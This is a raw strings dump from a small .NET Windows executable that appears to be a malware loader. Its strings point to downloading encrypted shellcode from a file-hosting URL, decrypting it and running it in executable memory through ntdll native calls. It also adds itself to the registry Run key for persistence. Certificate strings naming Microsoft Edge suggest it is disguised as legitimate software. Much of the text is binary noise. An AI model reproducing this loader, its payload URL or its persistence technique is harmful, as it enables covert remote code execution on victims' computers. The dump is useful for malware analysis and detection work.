!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
<LoadWithNT>b__8_0
Microsoft.Win32
ConsoleApp3
<Module>
PAGE_EXECUTE_READ
PAGE_GUARD
PAGE_NOCACHE
PAGE_WRITECOMBINE
MEM_RELEASE
PAGE_READWRITE
PAGE_EXECUTE_READWRITE
PAGE_EXECUTE
MEM_RESERVE
MEM_RESET_UNDO
PAGE_NOACCESS
MEM_RESET
MEM_DECOMMIT
MEM_COMMIT
LoadWithNT
PAGE_READONLY
PAGE_WRITECOPY
PAGE_EXECUTE_WRITECOPY
value__
DownloadData
mscorlib
TypeAlloc
_disposed
<Asynchronous>k__BackingField
method
DownloadShellCode
encryptedShellCode
DecryptShellCode
shellCode
get_Message
EndInvoke
BeginInvoke
IDisposable
SafeHandle
_safeHandle
SafeFileHandle
RuntimeTypeHandle
GetTypeFromHandle
ProcessHandle
FreeConsole
WriteLine
get_None
FreeType
AllocationType
Dispose
MulticastDelegate
DebuggerBrowsableState
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
DebuggerBrowsableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
SetValue
ConsoleApp3.exe
RegionSize
bufferSize
SuppressFinalize
System.Threading
System.Runtime.Versioning
String
disposing
AsyncCallback
callback
Marshal
kernel32.dll
ntdll.dll
Program
System
CancellationToken
written
get_Location
Action
System.Reflection
PageProtection
Exception
SetRegistryStartup
ShellCodeLoader
buffer
ShellCodeCaller
TaskScheduler
CurrentUser
GetDelegateForFunctionPointer
Crypter
UIntPtr
System.Diagnostics
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
Microsoft.Win32.SafeHandles
numberOfBytes
System.Threading.Tasks
TaskCreationOptions
GetCurrentProcess
BaseAddress
ZeroBits
Imports
get_Asynchronous
set_Asynchronous
Concat
Object
object
oldProtect
newProtect
System.Net
op_Explicit
get_Default
IAsyncResult
result
WebClient
StartNew
OpenSubKey
RegistryKey
GetExecutingAssembly
NtFreeVirtualMemory
NtAllocateVirtualMemory
NtWriteVirtualMemory
NtProtectVirtualMemory
get_Factory
TaskFactory
Registry
WrapNonExceptionThrows
ConsoleApp3UI
ConsoleApp3
Copyright
2024
$708169ff-d3e2-4a46-8fe3-5f5ecdb90ebf
1.0.0.0
.NETFramework,Version=v4.7.2
FrameworkDisplayName
.NET Framework 4.7.2
C:\Users\H3OX\source\repos\ConsoleApp3\ConsoleApp3\obj\Debug\ConsoleApp3.pdb
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
Microsoft Edge0
121231220000Z
20981231220000Z0
Microsoft Edge0
Microsoft Edge
Microsoft Edge
pLo rO
20240806130341Z
DigiCert, Inc.1;09
2DigiCert Trusted G4 RSA4096 SHA256 TimeStamping CA0
230714000000Z
341013235959Z0H1
DigiCert, Inc.1 0
DigiCert Timestamp 20230
Ihttp://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
http://ocsp.digicert.com0X
Lhttp://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
l2|X/gGe
(f*^[0
DigiCert Inc1
www.digicert.com1!0
DigiCert Trusted Root G40
220323000000Z
370322235959Z0c1
DigiCert, Inc.1;09
2DigiCert Trusted G4 RSA4096 SHA256 TimeStamping CA0
http://ocsp.digicert.com0A
5http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
2http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
DigiCert Inc1
www.digicert.com1$0"
DigiCert Assured ID Root CA0
220801000000Z
311109235959Z0b1
DigiCert Inc1
www.digicert.com1!0
DigiCert Trusted Root G40
]J<0"0i3
v=Y]Bv
http://ocsp.digicert.com0C
7http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
4http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
~qj#k"
DigiCert, Inc.1;09
2DigiCert Trusted G4 RSA4096 SHA256 TimeStamping CA
240806130341Z0+
/1(0&0$0"
@WhA6o
4zoB\/Y;
https://tmpfiles.org/dl/10700323/fixclient.bin
Failed to decrypt shellcode.
Failed to download shellcode.
Failed to download shellcode:
Failed to decrypt shellcode:
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Failed to set registry startup:
ntdll.dll
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
ConsoleApp3UI
FileDescription
ConsoleApp3UI
FileVersion
1.0.0.0
InternalName
ConsoleApp3.exe
LegalCopyright
Copyright
2024
LegalTrademarks
ConsoleApp3
OriginalFilename
ConsoleApp3.exe
ProductName
ConsoleApp3
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0